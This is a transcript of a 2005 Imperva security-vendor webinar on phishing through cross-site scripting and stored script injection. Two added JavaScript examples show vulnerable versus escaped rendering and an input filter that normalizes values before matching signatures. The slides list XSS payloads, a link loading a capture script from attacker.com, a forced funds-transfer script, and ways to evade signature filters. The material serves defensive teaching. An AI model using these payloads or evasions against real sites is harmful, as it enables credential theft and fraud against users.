Phishing: When Attacks Get Embedded in Legitimate Websites
Live Webinar, May 26, 2005
A Word from our Sponsor: Imperva
Mission: Secure the Data Center
Product: SecureSphere Dynamic Profiling Firewall
• Protects proprietary information, custom business applications, and critical servers
• Addresses phishing, identity theft, data theft, malicious robots, worms, denial of service, and SQL injection
• Stops web attacks, database breaches, and worm infection
[Diagram: Internal Users → SecureSphere Gateways → Data Center (proprietary information, custom business applications and critical servers), managed by a SecureSphere Management Server]
Imperva Confidential
Today's Presenter: Amichai Shulman, CTO of Imperva
• Lecturer on information security at the Technion - Israel Institute of Technology
• CTO of Edvice, a security consultancy to banks and financial services firms
• Leads the Application Defense Center (ADC)
Application Defense Center (ADC)
• The attack and defense techniques presented today are the result of research done at Imperva's Application Defense Center
ADC Data Center Security Series
• Monthly live webinars on attacks targeting corporate data centers
• "Identity Theft" on 6/23 - register at impervaevents.webex.com
Phishing: Agenda
• What is Phishing
• Sizing the Threat
• Types of Phishing (demo)
• Commonly Proposed Solutions
• Phishing Techniques
  • Cross Site Scripting Phishing (demos)
  • Script Injection Phishing (demo)
• Phishing Defenses
  • Traditional Defenses
  • Evasion Techniques
  • Alternative Solutions
Phishing Threat: What is Phishing?
• Phishing = Social Engineering + Technical Subterfuge
• Objective
  • Steal the victim's credentials
  • Commit crimes using the stolen credentials
• Delivery Mechanism
  • Spoofed e-mail (or a website, IM, or weblog)
• The link sends the user to...
  • Bogus Website Phishing: a look-alike site under the attacker's control
  • Real Website Phishing: the genuine site, with attacker code running inside it
Phishing Threat: How Significant?
• 64 brands reported hijacked by phishing in February 2005
• Dramatic growth over the past 2 years
• Attack Implications
  • Lost revenue
  • Brand erosion
  • Regulatory issues: GLB, SOX, CA 1386 (California SB 1386), HIPAA
Source: antiphishing.org
Bogus Website Phishing Attack: Stealing login and password
Bogus Website Phishing: The Bait
• Use social engineering (such as e-mail) to get the victim to click a link that carries the attack
Bogus Website Phishing Attack: Easy to Detect
• Manual Solutions
  • User education
  • A user who looks at the URL sees that the website is fraudulent (the address bar shows http://www.attacker.com rather than the brand's own domain)
• Automated Solutions
  • Industry efforts for strict server authentication
  • Ex. client-side plug-ins (TrustBar, NetIBA, etc.)
Real Website Phishing Demonstration: Stealing login and password
Proposed Solutions for the Phishing Problem: Are they sufficient?
Real Website Phishing Threat: Proposed Solutions
• User awareness
  • Real Website Phishing shows the correct URL and the real certificate, so there is nothing for the user to spot
• Server authentication
  • Real Website Phishing attacks authenticate correctly, because the server really is the genuine one
• Hardware tokens
  • Real Website Phishing attacks run on the victim's system, inside the session the token has already opened
• Time-sensitive or one-time-use passwords
  • Real Website Phishing can exploit the credentials in real time, before they expire
Real Website Phishing Threat: Phishing Techniques
• Cross Site Scripting
  • The user interacts with the real website
  • The malicious code is stored at the attacker's site or in the link itself
• Script Injection
  • The user interacts with the real website
  • The malicious code is stored inside the real website's application database
Cross Site Scripting: How is it Done?
• The attack code is written in a standard client-side scripting language, e.g. JavaScript, VBScript, etc.
• A link in the e-mail mixes calls to the real website with attack code
  • The attack code can be loaded from the attacker's website: http://www.superveda.com/login.asp?return=javascript.src=http://www.attacker.com/logincapture.jscript
  • The attack can be completely incorporated into the link: http://www.superveda.com/dosearch.asp?return=<script> ATTACK </script>
• The returned web page mixes the real website's content with the attack
Cross Site Scripting (XSS) Phishing Demonstration: Stealing cookie credentials
Script Injection: How is it Done?
• A close relative of Cross Site Scripting (XSS)
• The difference is the location of the attack code
  • XSS: the attacker's website or the malicious link
  • Script Injection: the real web application's database
• Location makes all the difference
  • No action is required of the user: the attack runs when the victim loads the web page
  • The link can be totally benign, since the attack is not in the link but in the site
  • Potential liability for the website owner, since the attack is served from inside the website
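The two real-website vectors of the preceding slides, XSS with the payload in the link and script injection with the payload in the application database, as an added example that is not part of the Imperva deck. It is plain Node.js and renders HTML as strings instead of running a server; the page names, the in-memory `db`, the `renderSearch*`/`renderGuestbook*` functions and the sample payload are assumptions, and only the superveda.com and attacker.com hosts come from the slides.

```javascript
// Added example, not from the Imperva deck: reflected XSS (payload in the
// link) and script injection / stored XSS (payload in the application's own
// database) side by side, both fixed by the same output encoding.
// Page names, the in-memory `db` and the payload are hypothetical; the
// superveda.com / attacker.com hosts are the ones the slides use.

// Stand-in for the real website's application database (constructed data).
const db = { guestbook: [] };

// HTML-encode the characters that let text break out of an element or
// attribute context. Applied at output time, in HTML text/attribute context.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// --- Reflected XSS (attack in the link) ---
// The vulnerable search page echoes the query string parameter verbatim.
function renderSearchVulnerable(query) {
  return `<html><body><h1>Results for: ${query}</h1></body></html>`;
}
function renderSearchFixed(query) {
  return `<html><body><h1>Results for: ${escapeHtml(query)}</h1></body></html>`;
}

// The link the phisher mails out: real host, real page, payload in a parameter.
function phishingLink(host, payload) {
  return `http://${host}/dosearch.asp?q=${encodeURIComponent(payload)}`;
}
// The parameter value the server sees once the victim clicks (URL-decoded).
function queryFromLink(url) {
  return new URL(url).searchParams.get('q');
}

// --- Script injection / stored XSS (attack in the database) ---
// The payload is written once, then served to every visitor of a benign URL.
function postGuestbookEntry(text) {
  db.guestbook.push(text);
}
function renderGuestbookVulnerable() {
  return '<ul>' + db.guestbook.map(e => `<li>${e}</li>`).join('') + '</ul>';
}
function renderGuestbookFixed() {
  return '<ul>' + db.guestbook.map(e => `<li>${escapeHtml(e)}</li>`).join('') + '</ul>';
}

// Did an executable <script> element survive into the page?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Run both scenarios with the slides' "load the capture script from the
// attacker's host" idea as the payload and report whether it would execute.
function demo() {
  const payload = '<script src="http://www.attacker.com/logincapture.js"></script>';
  const link = phishingLink('www.superveda.com', payload);
  const query = queryFromLink(link);

  postGuestbookEntry('Great store, fast shipping.');   // legitimate visitor
  postGuestbookEntry(payload);                         // attacker's post

  return {
    link,
    reflectedVulnerable: containsScriptTag(renderSearchVulnerable(query)),
    reflectedFixed:      containsScriptTag(renderSearchFixed(query)),
    storedVulnerable:    containsScriptTag(renderGuestbookVulnerable()),
    storedFixed:         containsScriptTag(renderGuestbookFixed()),
  };
}

console.log(demo());
```

The point of the pairing is the one the slide makes: the fixed and vulnerable pages differ only in where the encoding happens, and the browser's address bar, certificate and server identity are identical in every case, so none of the bogus-site defenses apply.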
Script Injection Phishing Demonstration: Attack embedded in the real website's database
Real Website Phishing Threat: Attacks Can Be Anything...
• Steal user login credentials
• Steal cookie credentials
• Force the victim to execute an action
  • Any action the victim is allowed to perform on the website, because the script runs inside the victim's authenticated session
  • Script injected into a banking site to transfer funds:
    var f = document.forms['transfer_money'];
    f.to_account.value = 'Attackers Account';
    f.amount.value = 1000000;
    f.submit();
Cross Site Scripting Phishing Demonstration (2): Victim unknowingly makes a purchase
Traditional Defenses: Identifying Attacks
• Attacks contain <script> tags or javascript:/vbscript: URLs
• Widely known attack vectors:
  <script>alert()</script>
  <script src="http://attacker/script.js"></script>
  <img src="javascript: alert()">
  <img src="vbscript: alert()">
• Other HTML attributes may contain active code:
  <body background="javascript: alert()">
  <bgsound src="javascript: alert()">
  <iframe src="javascript: alert()"></iframe>
Traditional Defenses: Are Signatures Enough?
• Solution?
  • A signature-based mechanism
  • Block all requests containing a specified text string: "<script>", "javascript:" or "vbscript:"
• NO!
  • There are numerous ways to evade signature engines
  • The evasions exploit the richness of HTML and the lax parsing that browsers apply to it
Signature Evasion Techniques: Whitespace, Numerical Character Encoding, CSS (Cascading Style Sheets), Event Handlers
Evasion Techniques: Whitespace
• Between tokens and inside HTML strings, HTML parsers usually ignore line feeds, carriage returns, horizontal tabs and null characters
• Instead of "javascript:" an attacker can write "J avasc ri p t:", where each gap is a line feed, carriage return, tab or null rather than an ordinary space (a real space would break the URL scheme, but these characters are silently dropped)
Evasion Techniques: Numerical Character Encoding
• Characters inside HTML strings can be encoded as numerical character references
• Only the attribute value, the string in <tag attribute="string">, can be encoded this way; tag and attribute names cannot
• This lets an attack evade detection of the "javascript:" pattern by encoding one or more of its characters
• 25 different ways to encode 'j': 'j' = &#106; = &#0106; = &#00106; = … = &#x6A; = &#x6a; = &#X6A; = &#x06A; = …
• The semicolons are frequently not required, so we get an even greater variety of encodings
Evasion Techniques: CSS (Style Sheets)
• Style attributes can also be dynamically computed using JavaScript code (the expression() syntax is an Internet Explorer extension, so this vector depends on the victim's browser):
  <div style="width: expression(alert('Imperva'))">
• A style sheet need not be embedded in the HTML; it can be imported from another file, even on a different host (e.g., the attacker's), using the <link> tag
  • In http://attacker/attack.css: p { background-image: expression(alert("Imperva")); }
  • In the attack vector: <link rel="stylesheet" href="http://attacker/attack.css"> <p></p>
Evasion Techniques: Event Handlers
• HTML event handler attributes are implicitly JavaScript and therefore need no "javascript:" prefix:
  <body onLoad="alert()">
  <img src="http://wherever/doesnt_exist.jpg" onError="alert()">
  <marquee onStart="alert()"></marquee>
• More, using an element sized to cover the page so that any mouse movement fires the handler:
  <div style="position: absolute; left: 0px; top: 0px; height: 1000px; width: 1000px" onMouseOver="alert()"></div>
  <table onMouseOver="alert()" height=1000 width=1000>
• Many more event handlers (up to 80!) can be used
Evaluating Alternative Defenses: Traditional Defenses vs. Application Aware Defenses
Evaluating Alternative Defenses: Traditional Defense
• Apply a very large set of signatures to ALL traffic
  • onLoad, onMouseOver, onFocus, …
  • <script>, <link>, <img>, style=, …
  • Many more we haven't covered here
• Problems
  • Easy to evade with client-side encoding features, e.g. whitespace, numerical encoding, etc.
  • Many signatures carry a performance penalty
  • Many signatures produce false positives
  • Cannot block everything that remotely resembles HTML (i.e. anything with <angle> brackets or an equals sign)
  • In some places users are allowed to type in HTML code
Evaluating Alternative Defenses: Application Aware Defense
• Focus the search
  • Inspect only the relevant fields: identify dynamic pages and parse HTTP correctly
  • Don't bother with fields that normally accept scripts, e.g. forms that allow editing of HTML text
  • Look for attacks only if the field contains suspicious characters: < > = & # etc.
• Cover all cases
  • Normalize input using client-side decoding: remove the whitespace browsers ignore and decode numerical HTML and style-sheet encodings
  • Apply client-side decoding only where required
  • Create a comprehensive set of signatures
• Minimize the performance penalty and maximize accuracy
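The evasion techniques of the preceding slides (whitespace, numerical character encoding, CSS expressions, event handlers) and the normalize-then-match recipe of this slide, as one added example that is not Imperva's code or the SecureSphere engine. It is plain Node.js; the field names, the HTML allow-list, the signature names and the sample inputs are constructed for the example, and the signature set is a short illustration rather than a comprehensive one.

```javascript
// Added example, not Imperva's code or the SecureSphere engine: a small
// "application aware" input check built from the slide's recipe. It skips
// fields allow-listed for HTML, returns early when no markup-relevant
// character is present, normalizes the value the way a browser reads it
// (numeric character references decoded, the whitespace and NUL bytes that
// browsers ignore inside tokens stripped), and only then applies a short
// signature set. Field names, allow-list and samples are constructed.

// Fields that legitimately carry HTML (e.g. a rich-text editor) and are skipped.
const HTML_ALLOWED_FIELDS = new Set(['post_body']);

// Characters without which a value cannot introduce markup or an encoded
// sequence; if none is present there is nothing to decode or match.
const SUSPICIOUS = /[<>=&#]/;

// Decode &#106; &#0106; &#x6A; &#X6a, with or without the trailing semicolon,
// as a browser does inside attribute values. Out-of-range references stay as-is.
function decodeNumericRefs(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (match, num) => {
    const cp = /^x/i.test(num) ? parseInt(num.slice(1), 16) : parseInt(num, 10);
    return cp > 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
  });
}

// Browsers drop \t \n \r and NUL inside URL schemes and attribute tokens, so
// "j\nava\tscript:" is still javascript:. Strip them before matching.
function stripIgnoredWhitespace(s) {
  return s.replace(/[\t\n\r\0]/g, '');
}

// Decode first, then strip, so an encoded tab (&#9;) disappears as well.
function normalize(s) {
  return stripIgnoredWhitespace(decodeNumericRefs(s)).toLowerCase();
}

// Signatures applied to the normalized, lower-cased value. Deliberately short:
// the evasion work has already been undone by normalize().
const SIGNATURES = [
  { name: 'script-tag',     re: /<script\b/ },
  { name: 'js-uri',         re: /javascript:/ },
  { name: 'vbs-uri',        re: /vbscript:/ },
  { name: 'css-expression', re: /expression\s*\(/ },
  { name: 'ext-stylesheet', re: /<link\b[^>]*stylesheet/ },
  { name: 'event-handler',  re: /<[a-z][^>]*\bon[a-z]+\s*=/ },
];

// Returns null when the field is clean, else the name of the first signature hit.
function inspectField(fieldName, value) {
  if (HTML_ALLOWED_FIELDS.has(fieldName)) return null;   // focus the search
  if (!SUSPICIOUS.test(value)) return null;              // nothing to decode or match
  const norm = normalize(value);
  const hit = SIGNATURES.find(sig => sig.re.test(norm));
  return hit ? hit.name : null;
}

// Constructed request parameters: two benign values, the evasions from the
// slides, and the same <script> payload in an HTML-allowed field.
const SAMPLES = [
  ['q', 'cheap flights'],
  ['q', 'a < b and c > d'],
  ['q', '<script>alert()</script>'],
  ['q', '<img src="J\navasc\rri\tp\0t:alert()">'],                     // whitespace
  ['q', '<img src="&#106;&#0097;vascript:alert()">'],                  // decimal refs
  ['q', '<img src="&#x6A;&#X61vascript:alert()">'],                    // hex refs, one semicolon missing
  ['q', '<div style="width: expression(alert(1))">'],                  // CSS expression
  ['q', '<link rel="stylesheet" href="http://attacker/attack.css">'],
  ['q', '<img src="http://wherever/doesnt_exist.jpg" onError="alert()">'],
  ['q', '<body onLoad="alert()">'],
  ['post_body', '<script>alert()</script>'],                           // allow-listed field
];

function runSamples() {
  return SAMPLES.map(([field, value]) => inspectField(field, value));
}

console.log(runSamples());
```

The order of operations matters: matching "javascript:" before decoding misses every encoded variant, and a signature list long enough to cover the raw variants directly is what produces the false positives and performance cost the previous slide describes. Decoding only fields that contain a suspicious character keeps the normalization off the common path.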
SecureSphere Dynamic Profiling Firewall: Application Aware Defense
• ADC Signatures
  • Comprehensive set of signatures
• Dynamic Profiling
  • Identifies the relevant fields for signature checking
  • Automatically models the structure and dynamics of:
    • Web application: URLs, cookies, users, parameters, sessions, etc.
    • Database: SQL queries, tables, parameters, users, etc.
• Automatically updated
  • ADC Signatures are updated on a regular basis
  • Dynamic Profiling automatically adapts to application/database changes
[Diagram: Internal Users → SecureSphere Gateways → Data Centers, managed by a SecureSphere Management Server]
Thank You
Imperva, Inc.
950 Tower Lane, Suite 1710, Foster City, CA 94404
Sales: (866) 926-4678
www.imperva.com